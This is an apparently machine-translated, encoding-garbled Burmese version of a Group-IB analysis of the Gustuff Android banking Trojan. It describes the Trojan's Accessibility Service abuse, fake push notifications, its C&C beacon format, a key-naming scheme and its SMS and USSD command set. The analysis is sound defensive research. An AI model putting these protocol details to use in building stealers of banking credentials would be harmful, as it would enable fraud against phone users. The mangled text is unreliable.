ááá±á·ááá±á·ááá² Group-IB
Group-IB ááŸá áááá¯áá¬ážá¡ááºáá±á¬ áá¯ááºááœá²ááŒááºážá
áááºááŒá¬ááŸá¯ áá»áœááºážáá»ááºáá° Ivan Pisarev áá°á áá¯áá±ááááœáẠáá°ááẠGustuff á¡áá¯ááºáá¯ááºáá¯á¶ááŸáá·áº áááºážáá¡áá¹ááá¬ááºáá»á¬ážá¡ááŒá±á¬ááºáž á¡áá±ážá
áááºááᯠááŒá±á¬ááŒáááºá
Gustuff á áááºáá°ááᯠááá¯ááºááŸá¬áá¬áá²á
Gustuff ááẠá¡ááŒáá·áºá¡á á¡ááá¯á¡áá»á±á¬áẠáá¯ááºáá±á¬ááºáá»ááºáá»á¬ážáá«ááŸááá±á¬ malware áá»áá¯ážáááºáá áºáá áºáá¯á០ááá¯ááºááá¯ááºáá«áááºá developer áá¡ááá¯á¡á Trojan ááẠAndyBot malware á áá¬ážááŸááºážá¡áá áºááŒá áºáá¬ááŒá®áž 2017 áá¯ááŸá Ạááá¯áááºáá¬áááŸá áááºáᬠAndroid áá¯ááºážáá»á¬ážááᯠááá¯ááºááá¯ááºáᬠphishing áááºáá¯á¶á á¶áá»á¬ážááŸáá áºááá·áº ááœá±ááá¯ážáá°ááŸá¯áá»á¬ážááẠáá¬áááºááŒá®áž ááá¯ááºáá¶ááá¬áááºáá»á¬ážááŸáá·áº ááœá±áá±ážáá»á±ááŸá¯á áá áºáá»á¬ážá ááá¯ááá¯ááºážá¡ááºááá®áá±ážááŸááºážáá»á¬ážá¡ááŒá Ạáááºáá±á¬ááºáá¬ážáááºá Gustuff Bot ááŸá¬ážáááºážáááẠáá áºááá»áŸáẠáá±á«áºáᬠááá ááŒá áºááŒá±á¬ááºáž Bestoffer á áá±á¬áºááŒáá²á·áááºá
Gustuff ááá°áá¬ááᯠááœá²ááŒááºážá áááºááŒá¬ááŒááºážááŒáá·áº Trojan ááẠBank of Americaá Bank of Scotlandá JPMorganá Wells Fargoá Capital Oneá TD Banká PNC Bank áá²á·ááá¯á·áá±á¬ á¡ááŒá®ážáá¯á¶ážáááºáá»á¬ážá ááá¯ááá¯ááºážá¡ááºááá®áá±ážááŸááºážáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯áá±áá±á¬ áá¯á¶ážá áœá²áá°áá»á¬ážááᯠáá áºááŸááºáá¬ážááá¯ááºáááºááᯠááŒááá²á·ááẠBitcoin Walletá BitPayá Cryptopayá Coinbase á áááºááŒáá·áº
áá°áá ááá¹ááááºáááºáá¯ááºáááºáž Trojan á¡ááŒá Ạáááºáá®ážáá¬ážááŒá®ážá áááºááŸááá¬ážááŸááºážááœáẠGustuff ááẠááá¯ááºááá¯ááºááŸá¯á¡ááœáẠááŒá áºááá¯ááºáá»á±ááŸááá±á¬ áá áºááŸááºáá»á¬ážá á¬áááºážááᯠáááááá¬áᬠáá»á²á·ááœááºáá¬ážáááºá áááºáá»á¬ážá fintech áá¯áá¹ááá®áá»á¬ážááŸáá·áº crypto áááºáá±á¬ááºááŸá¯áá»á¬ážá¡ááœáẠAndroid á¡ááºááá®áá±ážááŸááºážáá»á¬ážá¡ááŒááºá Gustuff ááẠá á»á±ážááœááºá¡ááºááá®áá±ážááŸááºážáá»á¬ážá á¡áœááºááá¯ááºážá ááá¯ážáá»á¬ážá ááœá±áá±ážáá»á±ááŸá¯á áá áºáá»á¬ážááŸáá·áº instant messenger áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯áá°áá»á¬ážá¡ááœáẠáááºááœááºáá«áááºá á¡áá°ážáááŒáá·áº PayPalá Western Unioná eBayá Walmartá Skypeá WhatsAppá Gett Taxiá Revolut ááŸáá·áº á¡ááŒá¬ážá¡áá¬áá»á¬ážá
áááºááœáá·áºá¡ááŸááº- á¡á á¯ááá¯ááºá¡ááŒá¯á¶ááá¯ááºáá°ážá ááºááŸá¯á¡ááœáẠááœááºáá»ááºááŒááºážá
Gustuff ááẠAPKs áá»á¬ážááá¯á· ááá·áºááºáá»á¬ážáá«áá±á¬ SMS á á¬ááá¯á·ááŸá¯áá»á¬ážááŸáá áºááá·áº Android á áááºáá¯ááºážáá»á¬ážáá²ááá¯á· ááá¯ážáá±á¬ááºáááºáá±á¬ááºááŸá¯á "ááá¹ááááº" á¡á¬ážáááºážáá»ááºááŒáá·áº áá°ážááŒá¬ážáá»ááºááŒá áºáááºá áá¬áá¬áá¡áááá·áºáá±ážáá»ááºá¡á Android á ááºáá á¹á ááºážáá áºáá¯ááẠTrojan áá áºáá¯áá°ážá ááºáá¶ááá±á¬á¡áá«á Gustuff ááẠáá°ážá ááºáá¶áá¬ážááá±á¬áá¯ááºážáá¡áááºá¡ááœááºáá±áá¬áá±á·á áºááŸáá áºááá·áº ááá¯á·ááá¯áẠáá¬áá¬áá±áá¬áá±á·á áºááŸáá áºááá·áº ááá¯ááá¯áá»á¶á·ááŸá¶á·ááœá¬ážááá¯ááºáááºá Gustuff ááá¯ááºáá±á¬ááºááá¯ááºá áœááºážááẠá¡á á¯ááá¯ááºá¡ááŒá¯á¶ááá¯ááºáá°ážá ááºááŸá¯ááŸáá·áº áááºážáá¡á±á¬áºááá±áá¬áá»á¬ážáá á®ážááœá¬ážáá±ážáá¯ááºáááºážá¡ááœáẠá¡áá»á¬ážáá¯á¶ážá¡áááºážá¡ááŸá®ážááŒá áºá á±áááºá¡ááœáẠáá®ááá¯ááºážáá¯ááºáá¬ážááŒááºážááŒá áºááẠ- áááºážááœááºááá¬ážáááºááá¯ááá¯ááºážáááºáá¯ááºáááºážá¡ááºááá®áá±ážááŸááºážáá»á¬ážááŸáá·áº crypto ááá¯ááºáá¶á¡áááºáá»á¬ážááá¯á·ááœá±ááá¯ážáá°ááŸá¯ááá¯á¡ááŸáááºááŒáŸáá·áºáááºááŸáá·áºá¡ááá¯ááºážá¡áá¬á¡ááááœáá·áºááŒá¯ááá·áºáá°ážááŒá¬ážáá±á¬ "á¡ááá¯á¡áá»á±á¬ááºááŒáá·áºááŒááºáž" áá¯ááºáá±á¬ááºáá»ááºáá«ááŸááááºá
Trojan á áá±á·áá¬ááŸá¯áá áºáá¯á¡á ááááºá áœááºážáá°áá»á¬ážá¡ááœáẠáááºáá±á¬ááºááŸá¯ááŒá áºáá±á¬ Accessibility Service ááᯠá¡áá¯á¶ážááŒá¯á áááºážááœáẠá¡ááá¯á¡áá»á±á¬ááºááŒáá·áºááá·áº áá¯ááºáá±á¬ááºáá»ááºááᯠá¡áá±á¬ááºá¡áááºáá±á¬áºáá²á·ááŒá±á¬ááºáž ááŒááá²á·áááºá Gustuff ááẠဠAndroid áááºáá±á¬ááºááŸá¯ááᯠá¡áá¯á¶ážááŒá¯á á¡ááŒá¬ážá¡ááá®áá±ážááŸááºážáá»á¬ážá áááºážááá¯ážááŒááºá ááºáá»á¬ážááŸáá·áº á¡ááŒááºá¡ááŸááºáááºááœááºááŒááºážá០á¡áá¬á¡ááœááºááᯠá¡á±á¬ááºááŒááºá áœá¬ áá»á±á¬áºááŒááºááá¯ááºááá·áº ááááá¯á¶áž Trojan ááá¯ááºáá«á ááá¯á·áá±á¬áºáááºáž áá¬ážá¡ááŒáá·áºáá¶ááŸáá·áº áá±á«ááºážá ááºá¡áá¯á¶ážááŒá¯ááá¯ááºááŸá¯ áááºáá±á¬ááºááŸá¯ááᯠá¡áá¯á¶ážááŒá¯ááŸá¯ááŸá¬ ááŸá¬ážáá«ážáá±áá±ážáááºá
áá±áá¯á¶ážáá°ááá¯ááºážááá¯á· áá±á«ááºážáá¯ááºááœá²ááŒá®ážáá±á¬ááºá Accessibility Service ááá¯á¡áá¯á¶ážááŒá¯á Gustuff ááẠááá¯ááºááá¯ááºáá°áá»á¬ážá¡ááœáẠááá¯á¡ááºááá·áºáá¯ááºáá±á¬ááºáá»ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºááá·áº á¡ááŒá¬ážá¡ááá®áá±ážááŸááºážáá»á¬áž (áááºáá¯ááºáááºážá cryptocurrencyá á¡ááŒááºá¡áœááºááá¯ááºážá á»á±ážáááºá á á¬ááá¯áá±ážááá¯á·ááŒááºážá áááºááŒáá·áº) á window á¡á áááºá¡ááá¯ááºážáá»á¬ážááŸáá·áº á¡ááŒááºá¡ááŸááºá¡áá»áá¯ážáááºáá±á¬ááºááá¯ááºááẠ. á¥ááá¬á¡á¬ážááŒáá·áºá áá¬áá¬áá¡áááá·áºáá±á¬áºááœááºá Trojan ááẠááá¯ááºáá»á¬ážááá¯ááŸáááºá áááºáá¯ááºáááºážá¡ááá®áá±ážááŸááºážáá»á¬ážááŸá á á¬áá¬ážáááºáááºáá»á¬ážááááºááá¯ážáá»á¬ážááᯠááŒá±á¬ááºážáá²ááá¯ááºáááºá Accessibility Service ááá¹ááá¬ážááá¯á¡áá¯á¶ážááŒá¯ááŒááºážááŒáá·áº Trojan ááẠááááºáá»áá¯ážáááºááá¯ááá¯ááºáž Trojan áá»á¬ážááᯠáááºááŒááºááẠáááºáá»á¬ážááŸá¡áá¯á¶ážááŒá¯ááá·áº áá¯á¶ááŒá¯á¶áá±ážááá¹ááá¬ážáá»á¬ážááᯠáá»á±á¬áºááœáŸá¬ážááá¯ááºá á±ááá·áºá¡ááŒáẠAndroid OS áá¬ážááŸááºážá¡áá áºááœáẠGoogle á០á¡áá±á¬ááºá¡áááºáá±á¬áºááá·áº áá¯á¶ááŒá¯á¶áá±ážáá°áá«áá¡ááŒá±á¬ááºážá¡áá²áá»á¬ážááá¯áá« ááœáá·áºááŒá¯áá±ážáá«áááºá ááá¯á·ááŒá±á¬áá·áºá Gustuff ááẠGoogle Protect á¡áá¬á¡ááœááºááá¯ááááºááẠ"áááºáá²á·ááá¯á·áááááº" ááŒá áºáááº- á á¬áá±ážáá°á¡ááá¯á¡áá á€áá¯ááºáá±á¬ááºáá»ááºááẠá¡ááŸá¯áá±á«ááºáž 70% ááœááºá¡áá¯ááºáá¯ááºáááºá
Gustuff ááẠááá¬ážáááºááá¯ááá¯ááºáž á¡ááá®áá±ážááŸááºážáá»á¬ážá áááºá¹áá±ááá»á¬ážááŒáá·áº á¡áá¯á¡áá±á¬áẠPUSH ááááá±ážáá»ááºáá»á¬ážááá¯áááºáž ááŒáááá¯ááºáááºá á¡áá¯á¶ážááŒá¯áá°ááẠPUSH á¡ááŒá±á¬ááºážááŒá¬ážáá»ááºááᯠááŸáááºááŒá®áž áá¬áá¬á០áá±á«ááºážáá¯ááºáá¯ááºáá¬ážáá±á¬ phishing áááºážááá¯ážááᯠááœá±á·áááŒá®áž áááºážááẠáá±á¬ááºážááá¯áá¬ážáá±á¬ áááºááẠááá¯á·ááá¯áẠcrypto ááá¯ááºáá¶á¡áááºáá±áá¬ááá¯á· áááºáá±á¬ááºááá·áºáá±áá¬ááŒá
áºáááºá á¡ááŒá¬áž Gustuff á¡ááŒá±á¡áá±ááœááºá PUSH á¡ááŒá±á¬ááºážááŒá¬ážáá»ááºááᯠááŒááá¬ážááá·áºááá¯ááºá
á¬áž á¡ááá®áá±ážááŸááºážááᯠááœáá·áºáá¬ážáááºá á€ááá
á¹á
ááœááºá Accessibility Service ááŸáá
áºááá·áº áá¬áá¬á០á¡áááá·áºáá±ážáá»ááºá¡á Malware ááẠááááºáááºááŸá¯áá
áºáá¯á¡ááœáẠáááºáá¯ááºáááºážáá»áŸá±á¬ááºááœáŸá¬á áá±á¬ááºááœááºáááºáá»á¬ážááᯠááŒáá·áºá
áœááºááá¯ááºáá«áááºá
Gustuff á áá¯ááºáá±á¬ááºááá¯ááºá áœááºážááœáẠáá¬áá¬ááá¯á· áá°ážá ááºáá¶áá¬ážááá±á¬ á ááºáá á¹á ááºážáá áºáá¯á¡ááŒá±á¬ááºáž á¡áá»ááºá¡áááºáá»á¬áž áá±ážááá¯á·ááŒááºážá SMS áááºáá±á·áá»áºáá»á¬áž áááºááŒááºáž/áá±ážááá¯á·ááŒááºážá USSD áá±á¬ááºážááá¯ááŸá¯áá»á¬áž áá±ážááá¯á·ááŒááºážá SOCKS5 Proxy ááá¯ááœáá·áºááŒááºážá ááá·áºááºáá áºáá¯á¡á¬áž ááá¯ááºáá»áŸá±á¬ááºááŒááºážá ááá¯ááºáá»á¬ážáá±ážááá¯á·ááŒááºáž (á á¬ááœááºá á¬áááºážáá»á¬ážá áááºáá¬ážááŒááºáá¬ááºáá¯á¶áá»á¬ážá áá¬ááºáá¯á¶áá»á¬ážá¡áá«á¡áááº) ááá¯á·áááºáž áá«áááºáá«áááºá áá¬áá¬á á ááºáá á¹á ááºážááᯠá ááºáá¯á¶áááºáááºáá»á¬ážááá¯á· ááŒááºáááºáááºááŸááºáá«á
Malware Analysis
á¡áá¹ááá¬ááºááŸááá±á¬ á¡ááá®áá±ážááŸááºážááᯠááááºáááºáá®á Android OS ááẠáá¯á¶ážá áœá²áá°á¡á¬áž Gustuff á០áá±á¬ááºážááá¯áá¬ážáá±á¬ á¡ááœáá·áºá¡áá±ážáá»á¬ážá á¬áááºážáá«ááŸááá±á¬ áááºážááá¯ážáá áºáá¯ááᯠááŒááááº-
á¡áá¯á¶ážááŒá¯áá°áááœáá·áºááŒá¯áá»ááºáááŸáááŒá®ážááŸáᬠá¡ááá®áá±ážááŸááºážááᯠááá·áºááœááºážáááºááŒá
áºáááºá á¡ááá®áá±ážááŸááºážááá¯ááœáá·áºááŒá®ážáá±á¬ááºá Trojan ááẠáá¯á¶ážá
áœá²áá°á¡á¬áž áááºážááá¯ážáá
áºáá¯ááŒááááá·áºáááº-
ááŒá®ážáá«á áááºážáá¡áá¯ááºááœááºááᯠáááºááŸá¬ážáá«áááºá
Gustuff ááẠFTT ááŸáá¯ááºááá¯ážáá°áá áºáŠážááŸá á¬áá±ážáá°áá¡ááá¯á¡á Gustuff ááá¯áá¯ááºááá¯ážáá¬ážáááºá á áááºááŒá®ážáá±á¬ááºá á¡ááá®áá±ážááŸááºážááẠááœáŸááºááŒá¬ážáá»ááºáá»á¬ážáááºáá¶áááŸáááẠCnC áá¬áá¬ááᯠá¡áá«á¡á¬ážáá»á±á¬áºá áœá¬ áááºááœááºáááºá áá»áœááºá¯ááºááá¯á· á á áºáá±ážáá²á·áá±á¬ ááá¯ááºá¡áá»á¬ážá¡ááŒá¬ážááẠááááºážáá»á¯ááºááŸá¯áá¬áá¬á¡ááŒá ẠIP ááááºá á¬ááᯠá¡áá¯á¶ážááŒá¯áá²á·áááºá ááá.áá.áá[.]áá (ááá¯áá±á¬ááºááá¯ááºážááœáẠáááºážááᯠáááºááœáŸááºážáá±á¬áºááŒáá«áááºá <%CnC%>).
á áááºááŒá®ážáá±á¬ááºá áááá¯ááááºááẠáá¬áá¬ááá¯á· áááºáá±á·áá»áºáá»á¬áž á áááºáááºá http://<%CnC%>/api/v1/get.php.
áá¯á¶á·ááŒááºááŸá¯ááẠá¡á±á¬ááºáá«áá±á¬áºáááºááœáẠJSON ááŒá áºááẠáá»áŸá±á¬áºááá·áºáááº-
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}
á¡ááá®áá±ážááŸááºážááᯠáááºááŒáá·áºááá¯ááºážá áááºážááẠáá±á¬áá«ááá¯ážáá°ážá ááºáá¶áá¬ážáááá·áº á ááºáá á¹á ááºážá¡ááŒá±á¬ááºáž á¡áá»ááºá¡áááºáá»á¬ážááᯠáá±ážááá¯á·áááºá áááºáá±á·áá»áºáá¯á¶á á¶ááᯠá¡á±á¬ááºááœááºáá±á¬áºááŒáá¬ážáááºá ááœááºáááºáá»á¬áž ááŒáá·áºáá±á¬, á¡ááá¯, apps áá»á¬áž О á¡ááœáá·áº - á áááºááŒáá¯ááºááœá±ážáá»ááºááá¯ááºááŒá®áž CnC á០áá±á¬ááºážááá¯áá»ááºáá áºáá¯á¡ááœááºáᬠáá±ážááá¯á·áá«áááºá
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
}
ááœá²á·á ááºážááŸá¯áá±áá¬ááᯠááááºážáááºážááŒááºážá
Gustuff ááẠáá¯ááºáááºážáá±á¬ááºááœááºáá¬ááœáẠá¡áá±ážááŒá®ážáá±á¬ á¡áá»ááºá¡áááºáá»á¬ážááᯠáŠážá á¬ážáá±ážááá¯ááºááœáẠááááºážáááºážáá¬ážáááºá ááá¯ááºá¡áááºá¡ááŒáẠáááºážááŸá ááá·áºáááºáá»ááºáá»á¬ážáá¡áááºáá»á¬ážááẠá á¬ááŒá±á¬ááºážá០MD5 áá±á«ááºážáááºááᯠááœááºáá»ááºááŒááºážáááááºááŒá áºááẠ15413090667214.6.1<%name%>áááºááŸá¬ <%name%> - áááŠážá¡áááº-áááºááá¯ážá áá¬áááºáá»áá¯ážáááºáá¯ááºáá±á¬ááºáá»ááºá Python áá¡áááá¹áá¬ááºááœáá·áºááá¯áá»ááº
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
á¡á±á¬ááºáá«á¡áá»ááºáá»á¬ážááᯠáá»áœááºá¯ááºááá¯á· áá±á«áºááŒáá«áááºá nameGenerator(ááá·áºááœááºážááŸá¯).
áá®áá±á¬á· ááááá¯á¶áž ááá¯ááºáá¬áááºá- nameGenerator("API_SERVER_LIST")á áááºážááœáẠá¡á±á¬ááºáá«á¡áááºáá»á¬ážááŒáá·áº áááºááá¯ážáá»á¬áž áá«áááºáááº-
ááŒá±á¬ááºážáá²ááá¯ááºáá±á¬á¡ááẠ| á¡ááá¯áž |
---|---|
nameGenerator("API_SERVER_LIST") | áááºážáá»ááºážááŸá¯áá¯á¶á á¶ááŒáá·áº CnC ááááºá á¬áá»á¬ážá á¬áááºážáá áºáá¯áá«ááŸááááºá |
nameGenerator("API_SERVER_URL") | CnC ááááºá á¬áá«ááŸááááºá |
nameGenerator("SMS_UPLOAD") | á¡áá¶ááᯠáá¯á¶áá±áááºááŸááºáá¬ážáááºá á¡áá¶áááºááŸááºáá¬ážáá«áá CnC ááá¯á· SMS á á¬ááá¯áá±ážááá¯á·áá«á |
nameGenerator("SMS_ROOT_NUMBER") | áá±á¬áá«ááá¯ážáá°ážá ááºáá¶áá¬ážááá±á¬ á ááºá០áááºáá¶áááŸáááá·áº SMS áááºáá±á·áá»áºáá»á¬áž áá±ážááá¯á·ááá·áºáá¯ááºážáá¶áá«ááºá áá°áááºážááŸá¬ null ááŒá áºáááºá |
nameGenerator("SMS_ROOT_NUMBER_RESEND") | á¡áá¶ááᯠáá°áááºážá¡ááá¯ááºáž ááŸááºážáááºážáá¬ážáááºá ááá·áºááœááºážáá¬ážáá«áá áá±á¬áá«ááá¯ážáá°ážá ááºáá¶áá¬ážááá±á¬á ááºáá á¹á ááºážááẠSMS áá áºá á±á¬ááºáááºáá¶áááŸááá±á¬á¡áá«á áááºážááᯠroot áá¶áá«ááºááá¯á· áá±ážááá¯á·áááºááŒá áºáááºá |
nameGenerator("DEFAULT_APP_SMS") | á¡áá¶ááᯠáá°áááºážá¡ááá¯ááºáž ááŸááºážáááºážáá¬ážáááºá á€á¡áá¶ááᯠáááºááŸááºáá«áá á¡ááá®áá±ážááŸááºážááẠá¡ááẠSMS áááºáá±á·áá»áºáá»á¬ážááᯠáá¯ááºáá±á¬ááºáá«áááºá |
nameGenerator("DEFAULT_ADMIN") | á¡áá¶ááᯠáá°áááºážá¡ááá¯ááºáž ááŸááºážáááºážáá¬ážáááºá á¡áá¶ááᯠáááºááŸááºáá«áá á¡ááá®áá±ážááŸááºážááœáẠá á®áá¶ááá·áºááœá²ááá¯ááºááœáá·áºááŸááááºá |
nameGenerator("DEFAULT_ACCESSIBILITY") | á¡áá¶ááᯠáá°áááºážá¡ááá¯ááºáž ááŸááºážáááºážáá¬ážáááºá á¡áá¶ááᯠáááºááŸááºáá«áá Accessibility Service ááᯠá¡áá¯á¶ážááŒá¯ááá·áº áááºáá±á¬ááºááŸá¯áá áºáᯠáá¯ááºáá±á¬ááºáá±áá«áááºá |
nameGenerator("APPS_CONFIG") | áá®ážááŒá¬ážá¡ááá®áá±ážááŸááºážáá áºáá¯ááŸáá·áºáááºá ááºáá±á¬ á¡áá»á¬ážáá¯á¶ážá áœá²ááá¯ááºááŸá¯ááŒá áºáááºáá áºáᯠá¡á áá»áá¯ážááá·áºá¡áá« áá¯ááºáá±á¬ááºáááá·áº áá¯ááºáá±á¬ááºáá»ááºáá»á¬ážá á¬áááºážáá«ááŸááá±á¬ JSON á¡áá¬ááá¹áá¯áá áºáá¯á |
nameGenerator("APPS_INSTALLED") | á ááºáá±á«áºááœáẠááá·áºááœááºážáá¬ážááá·áº á¡ááá®áá±ážááŸááºážáá»á¬ážá á¬áááºážááᯠááááºážáááºážáááºá |
nameGenerator("IS_FIST_RUN") | áááá¡á ááœáẠá¡áá¶ááᯠááŒááºáááºáááºááŸááºáááºá |
nameGenerator("UNIQUE_ID") | áá°ážááŒá¬ážáá±á¬ ááœá²ááŒá¬ážáááºááŸááºááŸá¯ áá«ááŸááááºá áá±á¬á·ááºááᯠááááá¯á¶ážá¡ááŒááẠá áááºáá±á¬á¡áá« áá¯ááºáá±ážáááºá |
áá¬áá¬á០ááœáŸááºááŒá¬ážáá»ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºááẠáá±á¬áºáá»á°áž
á¡ááá®áá±ážááŸááºážááẠCnC áá¬áá¬áá»á¬ážá ááááºá á¬áá»á¬ážááᯠáá¯ááºááŸááºáá¬ážáá±á¬ array áá¯á¶á á¶ááŒáá·áº ááááºážáááºážáá¬ážáááºá á¡ááŒá±áᶠáá ááá¯ááºážáá»á¬ážá ááá·áºáá»á±á¬áºáá±á¬ command ááá¯áááºáá¶áááŸááá±á¬á¡áá«ááœáẠCnC áá¬áá¬áá»á¬ážá á¬áááºážááᯠááŒá±á¬ááºážáá²ááá¯ááºáááºá áááºážá¡ááŒá±á¡áá±ááœáẠááááºá á¬áá»á¬ážááᯠáŠážá á¬ážáá±ážááá¯ááºááœáẠááááºážáááºážáá¬ážáááºááŒá áºáááºá
áá±á¬ááºážááá¯áá»ááºááᯠáá¯á¶á·ááŒááºááá·áºá¡áá±ááŒáá·áº áá¬áá¬ááẠá¡ááá®áá±ážááŸááºážáá¶ááá¯á· á¡áááá·áºáá áºáᯠáá±ážááá¯á·áááºá command áá»á¬ážááŸáá·áº parameter áá»á¬ážááᯠJSON áá±á¬áºáááºááŒáá·áº ááŒááá¬ážááŒá±á¬ááºáž áááááŒá¯ááá·áºáááºá á¡ááá®áá±ážááŸááºážááẠá¡á±á¬ááºáá« command áá»á¬ážááᯠáá¯ááºáá±á¬ááºááá¯ááºáááº-
á¡ááœá²á· | áá±á«áºááŒáá»áẠ|
---|---|
forwardStart | áá°ážá ááºáá¶áá¬ážááá±á¬ á ááºá០áááºáá¶áááŸááá±á¬ SMS á á¬ááá¯áá»á¬ážááᯠCnC áá¬áá¬ááá¯á· á áááºáá±ážááá¯á·áá«á |
ááŸá±á·ááá¯á·áááºáá«á | áá°ážá ááºáá¶áá¬ážááá±á¬ á ááºá០áááºáá¶áááŸááá±á¬ SMS á á¬ááá¯áá»á¬ážááᯠCnC áá¬áá¬ááá¯á· áá±ážááá¯á·ááŒááºážááᯠáááºáá«á |
ussdRun | USSD áá±á¬ááºážááá¯ááŸá¯ááᯠáá¯ááºáá±á¬ááºáá«á USSD áá±á¬ááºážááá¯ááŸá¯ááŒá¯áá¯ááºááẠááá¯á¡ááºááá·áº áá¶áá«ááºááẠJSON á¡ááœáẠâáá¶áá«ááºâ ááœáẠáááºááŸááááºá |
SMS ááá¯á·áá«á | SMS á á¬ááá¯áá áºá á±á¬áẠáá±ážááá¯á·áá« (ááá¯á¡ááºáá«á áááºáá±á·áá»áºááᯠá¡ááá¯ááºážáá»á¬ážá¡ááŒá Ạâááœá²áá¬ážáááº)á ááá·áºáááºáá»ááºáá áºáá¯á¡áá±ááŒáá·áºá command ááẠá¡ááœáẠâtoâ - áŠážáááºáá¬áá¶áá«ááºááŸáá·áº âbodyâ - áááºáááºáá»á¬ážáá«ááŸááá±á¬ JSON á¡áá¬ááá¹áá¯áá áºáá¯ááᯠáá°áá±á¬ááºáááºá |
SmsAb áá±ážááá¯á·áá«á | áá±á¬áá«ááá¯ážáá°ážá ááºáá¶áá¬ážááá±á¬ á ááºáá¡áááºá¡ááœááºá á¬áááºážááŸááá°ááá¯ááºážáᶠáááºáá±á·áá»áºáá»á¬áž (ááá¯á¡ááºáá«á áááºáá±á·áá»áºááᯠá¡ááá¯ááºážáá»á¬ážááœá²áá¬ážáááº)á á á¬ááá¯áá±ážááá¯á·ááŒááºážááŒá¬ážáá¬áááẠ10 á áá¹ááá·áºááŒá áºáááºá áááºáá±á·áá»áºáááá¯ááºáááºááẠJSON á¡ááœáẠ"ááá¯ááºáááº" ááœááºááŒá áºááẠ|
SmsMass áá±ážááá¯á·áá«á | ááœáŸááºááŒá¬ážáá»ááºáá±á¬ááºáá»á¬ážááœáẠáááºááŸááºáá¬ážáá±á¬ á¡áááºá¡ááœááºáá»á¬ážááá¯á· SMS áááºáá±á·áá»áºáá»á¬áž (ááá¯á¡ááºáá«á áááºáá±á·áá»áºááᯠá¡ááá¯ááºážáá»á¬ážá¡ááŒá Ạ"ááœá²áá¬ážáááº")á á á¬ááá¯áá±ážááá¯á·ááŒááºážááŒá¬ážáá¬áááẠ10 á áá¹ááá·áºááŒá áºáááºá ááá·áºáááºáá»ááºáá áºáá¯á¡áá±ááŒáá·áºá ááœáŸááºááŒá¬ážáá»ááºááẠJSON á¡áááºážá¡áá»ááºáž (âsmsâ á¡ááœááº)á âtoâ - áŠážáááºáá¬áá¶áá«ááºááŸáá·áº âááá¯ááºáááºâ áááºáááºáá»á¬ážáá«ááŸááá±á¬ ááŒááºá ááºáá»á¬ážááᯠáááºáá±á·áá»áºá ááá¯ááºáááºááᯠáá°áááºá |
changeServer | á€á¡áááá·áºááẠáá«áá¬áá®áá¬áá áºáá¯á¡ááŒá Ạáá±á¬á· âurlâ ááŒáá·áº áááºááá¯ážáá áºáá¯ááᯠáá°ááá¯ááºááẠ- ááá¯á·áá±á¬áẠáá±á¬á·ááºááẠnameGenerator(âSERVER_URLâ) ááá¯á·ááá¯áẠâáááºážáá»ááºážááŒááºážâ ááááºááá¯ážááᯠááŒá±á¬ááºážáá²áááá·áºáááº- ááá¯á·áá±á¬áẠáá±á¬á·ááºááẠáá¬ááºáááºážááᯠnameGenerator (âAPI_SERVER_LISTâ) ááá¯á· áá±ážáá±ážáááá·áºááẠááá¯á·ááŒá±á¬áá·áº á¡ááá®áá±ážááŸááºážááẠCnC áá¬áá¬áá»á¬ážá ááááºá á¬ááᯠááŒá±á¬ááºážáá²áááºá |
á á®áá¶ááá·áºááœá²áá°áá¶áá«áẠ| á¡ááá¯áá« command ááᯠroot áá¶áá«ááºááŒáá·áºá¡áá¯ááºáá¯ááºáááºáá®ááá¯ááºážááŒá¯áá¯ááºáá¬ážáááºá ááœáŸááºááŒá¬ážáá»ááºááẠá¡á±á¬ááºáá«áá±á¬ááºáá»á¬ážáá«ááŸááá±á¬ JSON á¡áá¬ááá¹áá¯áá áºáá¯ááᯠáááºáá¶áááº- âáá¶áá«ááºâ â áááºáá¶áááŸáááá·áºáááºááá¯ážááá¯á· nameGenerator(âROOT_NUMBERâ) ááá¯ááŒá±á¬ááºážáá«á âááŒááºááá¯á·áá«â â change nameGenerator(âSMS_ROOT_NUMBER_RESENDâ), âsendIdâ â nameGenerator(âROOT_NUMBERâ ááá¯á· áá±ážááá¯á·áá« ) áá°ážááŒá¬ážáá±á¬ ID á |
updateInfo | áá±á¬áá«ááá¯ážáá°ážá ááºáá¶áá¬ážááá±á¬ á ááºáá á¹á ááºážá¡ááŒá±á¬ááºáž á¡áá»ááºá¡áááºáá»á¬ážááᯠáá¬áá¬ááá¯á· áá±ážááá¯á·áá«á |
